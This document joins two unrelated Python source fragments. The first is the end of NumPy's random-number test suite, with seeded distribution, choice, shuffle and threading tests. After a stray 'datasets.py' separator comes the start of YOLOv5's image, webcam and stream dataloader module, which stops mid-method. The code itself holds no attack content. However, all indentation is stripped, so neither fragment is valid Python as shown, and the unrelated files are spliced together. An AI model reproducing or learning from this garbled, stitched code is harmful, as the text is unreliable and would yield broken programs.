# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random_sample(self):
np.random.seed(self.seed)
actual = np.random.random_sample((3, 2))
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_choice_uniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
np.testing.assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
np.testing.assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
np.testing.assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False,
p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
np.testing.assert_array_equal(actual, desired)
def test_choice_noninteger(self):
np.random.seed(self.seed)
actual = np.random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['c', 'd', 'c', 'd'])
np.testing.assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = np.random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2, replace=False,
p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(np.random.choice(2, replace=True)))
assert_(np.isscalar(np.random.choice(2, replace=False)))
assert_(np.isscalar(np.random.choice(2, replace=True, p=p)))
assert_(np.isscalar(np.random.choice(2, replace=False, p=p)))
assert_(np.isscalar(np.random.choice([1, 2], replace=True)))
assert_(np.random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(np.random.choice(2, s, replace=True)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False)))
assert_(not np.isscalar(np.random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(np.random.choice([1, 2], s, replace=True)))
assert_(np.random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_(np.random.choice(6, s, replace=True).shape, s)
assert_(np.random.choice(6, s, replace=False).shape, s)
assert_(np.random.choice(6, s, replace=True, p=p).shape, s)
assert_(np.random.choice(6, s, replace=False, p=p).shape, s)
assert_(np.random.choice(np.arange(6), s, replace=True).shape, s)
def test_bytes(self):
np.random.seed(self.seed)
actual = np.random.bytes(10)
desired = asbytes('\x82Ui\x9e\xff\x97+Wf\xa5')
np.testing.assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, 1),
("b", np.int32, 1)])]:
np.random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
np.random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
np.testing.assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5,4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
np.random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
np.random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_beta(self):
np.random.seed(self.seed)
actual = np.random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
np.random.seed(self.seed)
actual = np.random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[37, 43],
[42, 48],
[46, 45]])
np.testing.assert_array_equal(actual, desired)
def test_chisquare(self):
np.random.seed(self.seed)
actual = np.random.chisquare(50, size=(3, 2))
desired = np.array([[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006]])
np.testing.assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
np.random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = np.random.mtrand.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598]],
[[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688]],
[[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799]]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, np.random.dirichlet, p, np.float(1))
def test_exponential(self):
np.random.seed(self.seed)
actual = np.random.exponential(1.1234, size=(3, 2))
desired = np.array([[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_f(self):
np.random.seed(self.seed)
actual = np.random.f(12, 77, size=(3, 2))
desired = np.array([[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
np.random.seed(self.seed)
actual = np.random.gamma(5, 3, size=(3, 2))
desired = np.array([[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_geometric(self):
np.random.seed(self.seed)
actual = np.random.geometric(.123456789, size=(3, 2))
desired = np.array([[8, 7],
[17, 17],
[5, 12]])
np.testing.assert_array_equal(actual, desired)
def test_gumbel(self):
np.random.seed(self.seed)
actual = np.random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_hypergeometric(self):
np.random.seed(self.seed)
actual = np.random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[10, 10],
[10, 10],
[9, 9]])
np.testing.assert_array_equal(actual, desired)
# Test nbad = 0
actual = np.random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
np.testing.assert_array_equal(actual, desired)
actual = np.random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
np.testing.assert_array_equal(actual, desired)
# Test ngood = 0
actual = np.random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
np.testing.assert_array_equal(actual, desired)
actual = np.random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
np.testing.assert_array_equal(actual, desired)
def test_laplace(self):
np.random.seed(self.seed)
actual = np.random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_logistic(self):
np.random.seed(self.seed)
actual = np.random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
np.random.seed(self.seed)
actual = np.random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273]])
np.testing.assert_array_almost_equal(actual, desired, decimal=13)
def test_logseries(self):
np.random.seed(self.seed)
actual = np.random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[2, 2],
[6, 17],
[3, 6]])
np.testing.assert_array_equal(actual, desired)
def test_multinomial(self):
np.random.seed(self.seed)
actual = np.random.multinomial(20, [1/6.]*6, size=(3, 2))
desired = np.array([[[4, 3, 5, 4, 2, 2],
[5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4],
[2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3],
[4, 3, 4, 2, 3, 4]]])
np.testing.assert_array_equal(actual, desired)
def test_multivariate_normal(self):
np.random.seed(self.seed)
mean = (.123456789, 10)
# Hmm... not even symmetric.
cov = [[1, 0], [1, 0]]
size = (3, 2)
actual = np.random.multivariate_normal(mean, cov, size)
desired = np.array([[[-1.47027513018564449, 10.],
[-1.65915081534845532, 10.]],
[[-2.29186329304599745, 10.],
[-1.77505606019580053, 10.]],
[[-0.54970369430044119, 10.],
[0.29768848031692957, 10.]]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = np.random.multivariate_normal(mean, cov)
desired = np.array([-0.79441224511977482, 10.])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance raises warning
mean = [0, 0]
cov = [[1, 1 + 1e-10], [1 + 1e-10, 1]]
assert_warns(RuntimeWarning, np.random.multivariate_normal, mean, cov)
def test_negative_binomial(self):
np.random.seed(self.seed)
actual = np.random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[848, 841],
[892, 611],
[779, 647]])
np.testing.assert_array_equal(actual, desired)
def test_noncentral_chisquare(self):
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
actual = np.random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[ 1.47145377828516666, 0.15052899268012659],
[ 0.00943803056963588, 1.02647251615666169],
[ 0.332334982684171 , 0.15451287602753125]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
np.random.seed(self.seed)
actual = np.random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
np.random.seed(self.seed)
actual = np.random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_pareto(self):
np.random.seed(self.seed)
actual = np.random.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[2.46852460439034849e+03, 1.41286880810518346e+03],
[5.28287797029485181e+07, 6.57720981047328785e+07],
[1.40840323350391515e+02, 1.98390255135251704e+05]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# http://mail.scipy.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
np.random.seed(self.seed)
actual = np.random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[1, 0],
[0, 0]])
np.testing.assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, np.random.poisson, lamneg)
assert_raises(ValueError, np.random.poisson, [lamneg]*10)
assert_raises(ValueError, np.random.poisson, lambig)
assert_raises(ValueError, np.random.poisson, [lambig]*10)
def test_power(self):
np.random.seed(self.seed)
actual = np.random.power(a=.123456789, size=(3, 2))
desired = np.array([[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
np.random.seed(self.seed)
actual = np.random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_cauchy(self):
np.random.seed(self.seed)
actual = np.random.standard_cauchy(size=(3, 2))
desired = np.array([[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
np.random.seed(self.seed)
actual = np.random.standard_exponential(size=(3, 2))
desired = np.array([[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
np.random.seed(self.seed)
actual = np.random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_normal(self):
np.random.seed(self.seed)
actual = np.random.standard_normal(size=(3, 2))
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
np.random.seed(self.seed)
actual = np.random.standard_t(df=10, size=(3, 2))
desired = np.array([[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
np.random.seed(self.seed)
actual = np.random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
np.random.seed(self.seed)
actual = np.random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = np.random.uniform
np.testing.assert_raises(OverflowError, func, -np.inf, 0)
np.testing.assert_raises(OverflowError, func, 0, np.inf)
np.testing.assert_raises(OverflowError, func, fmin, fmax)
# (fmax / 1e17) - fmin is within range, so this should not throw
np.random.uniform(low=fmin, high=fmax / 1e17)
def test_vonmises(self):
np.random.seed(self.seed)
actual = np.random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
np.random.seed(self.seed)
r = np.random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
np.testing.assert_(np.isfinite(r).all())
def test_wald(self):
np.random.seed(self.seed)
actual = np.random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
np.random.seed(self.seed)
actual = np.random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_zipf(self):
np.random.seed(self.seed)
actual = np.random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29],
[1, 1],
[3, 13]])
np.testing.assert_array_equal(actual, desired)
class TestThread(object):
# make sure each state produces the same sequence even in threads
def setUp(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(np.random.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(np.random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if (np.intp().dtype.itemsize == 4 and sys.platform == "win32"):
np.testing.assert_array_almost_equal(out1, out2)
else:
np.testing.assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1/6.]*6, size=10000)
self.check_function(gen_random, sz=(10000,6))
if __name__ == "__main__":
run_module_suite()
|
datasets.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Dataloaders and dataset utils
"""
import glob
import hashlib
import json
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import Pool, ThreadPool
from pathlib import Path
from threading import Thread
from zipfile import ZipFile
import cv2
import numpy as np
import torch
import torch.nn.functional as F
import yaml
from PIL import ExifTags, Image, ImageOps
from torch.utils.data import DataLoader, Dataset, dataloader, distributed
from tqdm import tqdm
from utils.augmentations import Albumentations, augment_hsv, copy_paste, letterbox, mixup, random_perspective
from utils.general import (LOGGER, check_dataset, check_requirements, check_yaml, clean_str, segments2boxes, xyn2xy,
xywh2xyxy, xywhn2xyxy, xyxy2xywhn)
from utils.torch_utils import torch_distributed_zero_first
# Parameters
HELP_URL = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
IMG_FORMATS = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp', 'mpo'] # acceptable image suffixes
VID_FORMATS = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
WORLD_SIZE = int(os.getenv('WORLD_SIZE', 1)) # DPP
NUM_THREADS = min(8, os.cpu_count()) # number of multiprocessing threads
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(paths):
# Returns a single hash value of a list of paths (files or dirs)
size = sum(os.path.getsize(p) for p in paths if os.path.exists(p)) # sizes
h = hashlib.md5(str(size).encode()) # hash sizes
h.update(''.join(paths).encode()) # hash paths
return h.hexdigest() # return hash
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def exif_transpose(image):
"""
Transpose a PIL image accordingly if it has an EXIF Orientation tag.
Inplace version of https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py exif_transpose()
:param image: The image to transpose.
:return: An image.
"""
exif = image.getexif()
orientation = exif.get(0x0112, 1) # default 1
if orientation > 1:
method = {2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
4: Image.FLIP_TOP_BOTTOM,
5: Image.TRANSPOSE,
6: Image.ROTATE_270,
7: Image.TRANSVERSE,
8: Image.ROTATE_90,
}.get(orientation)
if method is not None:
image = image.transpose(method)
del exif[0x0112]
image.info["exif"] = exif.tobytes()
return image
def create_dataloader(path, imgsz, batch_size, stride, single_cls=False, hyp=None, augment=False, cache=False, pad=0.0,
rect=False, rank=-1, workers=8, image_weights=False, quad=False, prefix='', shuffle=False):
if rect and shuffle:
LOGGER.warning('WARNING: --rect is incompatible with DataLoader shuffle, setting shuffle=False')
shuffle = False
with torch_distributed_zero_first(rank): # init dataset *.cache only once if DDP
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augmentation
hyp=hyp, # hyperparameters
rect=rect, # rectangular batches
cache_images=cache,
single_cls=single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // WORLD_SIZE, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = None if rank == -1 else distributed.DistributedSampler(dataset, shuffle=shuffle)
loader = DataLoader if image_weights else InfiniteDataLoader # only DataLoader allows for attribute updates
return loader(dataset,
batch_size=batch_size,
shuffle=shuffle and sampler is None,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn), dataset
class InfiniteDataLoader(dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler:
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages:
# YOLOv5 image/video dataloader, i.e. `python detect.py --source image.jpg/vid.mp4`
def __init__(self, path, img_size=640, stride=32, auto=True):
p = str(Path(path).resolve()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in IMG_FORMATS]
videos = [x for x in files if x.split('.')[-1].lower() in VID_FORMATS]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
self.auto = auto
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {IMG_FORMATS}\nvideos: {VID_FORMATS}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
s = f'video {self.count + 1}/{self.nf} ({self.frame}/{self.frames}) {path}: '
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, f'Image Not Found {path}'
s = f'image {self.count}/{self.nf} {path}: '
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride, auto=self.auto)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return path, img, img0, self.cap, s
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
# YOLOv5 local webcam dataloader, i.e. `python detect.py --source 0`
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
self.pipe = eval(pipe) if pipe.isnumeric() else pipe
self.cap = cv2.VideoCapture(self.pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
s = f'webcam {self.count}: '
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return img_path, img, img0, None, s
def __len__(self):
return 0
class LoadStreams:
# YOLOv5 streamloader, i.e. `python detect.py --source 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP streams`
def __init__(self, sources='streams.txt', img_size=640, stride=32, auto=True):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources) as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs, self.fps, self.frames, self.threads = [None] * n, [0] * n, [0] * n, [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
self.auto = auto
for i, s in enumerate(sources): # index, source
# Start thread to read frames from video stream
st = f'{i + 1}/{n}: {s}... '
if 'youtube.com/' in s or 'youtu.be/' in s: # if source is YouTube video
check_requirements(('pafy', 'youtube_dl'))
import pafy
s = pafy.new(s).getbest(preftype="mp4").url # YouTube URL
s = eval(s) if s.isnumeric() else s # i.e. s = '0' local webcam
cap = cv2.VideoCapture(s)
assert cap.isOpened(), f'{st}Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.fps[i] = max(cap.get(cv2.CAP_PROP_FPS) % 100, 0) or 30.0 # 30 FPS fallback
self.frames[i] = max(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)), 0) or float('inf') # infinite stream fallback
_, self.imgs[i] = cap.read() # guarantee first frame
self.threads[i] = Thread(target=self.update, args=([i, cap, s]), daemon=True)
LOGGER.info(f"{st} Success ({self.frames[i]} frames {w}x{h} at {self.fps[i]:.2f} FPS)")
self.threads[i].start()
LOGGER.info('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride, auto=self.auto)[0].shape for x in self.imgs])
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
LOGGER.warning('WARNING: Stream shapes differ. For optimal performance supply similarly-shaped streams.')
def update(self, i, cap, stream):
# Read stream `i` frames in daemon thread
n, f, read = 0, self.frames[i], 1 # frame number, frame array, inference every 'read' frame
while cap.isOpened() and n < f:
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n % read == 0:
success, im = cap.retrieve()
if success:
self.imgs[i] = im
else:
LOGGER.warning('WARNING: Video stream unresponsive, please check your IP camera connection.')
self.imgs[i] *= 0
cap.open(stream) # re-open stream if signal was lost
time.sleep(1 / self.fps[i]) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
